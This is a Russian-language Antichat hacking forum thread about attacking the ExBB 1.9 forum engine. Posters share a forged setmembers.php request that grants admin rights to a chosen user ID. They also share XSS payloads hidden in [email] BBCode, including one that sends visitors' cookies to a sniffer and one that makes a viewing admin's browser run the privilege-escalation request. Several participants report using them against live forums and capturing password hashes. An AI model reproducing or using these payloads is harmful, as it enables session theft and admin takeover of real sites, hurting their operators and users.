Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в ExBB 1.9 (https://forum.antichat.xyz/showthread.php?t=12327)

cardons 30.12.2005 23:57
Вопрос про уязвимости в ExBB 1.9
 
Какие у него есть Xss ошибки?Или сплойты.Дайте пжл

ZeroHour 31.12.2005 00:44
вот тебе линки на видео -
раз
два

было еще, но щас уже его почуму-то нету=(

cardons 31.12.2005 01:11
Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?

slime 02.01.2006 13:15
Цитата:
Сообщение от cardons
Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
хы, чувак, сам себя лолишь...
почти ко всем видосам прилогается тхт файлик со всем что ты видел на экране в блокнотике ...
ыыыыыыыыыыыыы

cardons 04.01.2006 02:22
Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.

slime 04.01.2006 12:25
Цитата:
Сообщение от cardons
Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
а что ты тз того видео не наешь как сделать???
как из админки сделать себя админом..... хы.... можно скачать себе этот форум и сгенерить этот урл...

но если лень то пжалста...
Код:
setmembers.php?action=edit_user&checkaction=yes&userid=[Пишем сюда ID юзера]&membertitle=&emailaddress=bla@bla.ru&newname=[тут должно быть новое имя]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC
на сколько я помню те КСС-ы у мя не работали чего-то вот ксс который работает
Код:
email]'style='display:none;background:url(javascript:document.images[2].src="[сниффер]?"+document.cookie)[/email]
подправь ксс а то тут его подпортить немнного пришлось чтобы видно было... ну суть думаю понятна

dante 28.01.2006 22:28
Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?

slime 29.01.2006 19:25
Цитата:
Сообщение от dante
Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
ну типа надо подождать немножко, пока админ просмотрит сообщение... или если у админа картинки отключены ничего не получится... ну или у админа броузер ОПЕРА... для оперы надо немного переделать КСС...
Код:
[*email]'style=background:url("javascript:document.images[0].src='setmembers.php?action=edit_user&checkaction=yes&userid=[ID]&membertitle=&emailaddress=bla@bla.ru&newname=[ИМЯ]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC'");[/*email]
Вот это проверил -- работает... только свой ID поставь и ИМЯ. и про репу желательно помнить :))

dante 30.01.2006 21:21
slime, репу я те плюснул, но что-то непохоже чтоб твоя ксс-ка меня админом сделала... последняя вообще отображается, добавил display:none - перестала, но я эту урлу тестил на нескольких форумах, и что-то пока не админ.. в чем может быть дело, есть какие-то идейки? Может знаешь, где копать? Буду весьма признателен

Romaxa55 30.01.2006 23:40
Парни, извините что в не тему, но вот сейчас проводил xss на ExBB 1.9.1 Снифер прошел хорошо, но дело в том, что хешь интересный, допустим пасс стоит 123456
хешь от него e10adc3949ba59abbe56e057f20f883e а приходит d41d8cd98f00b204e9800998ecf8427e , бред какойто, может кто подскажет, иль стукните в асю.
Я обычно в инвизбл сижу.


Время: 11:45
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице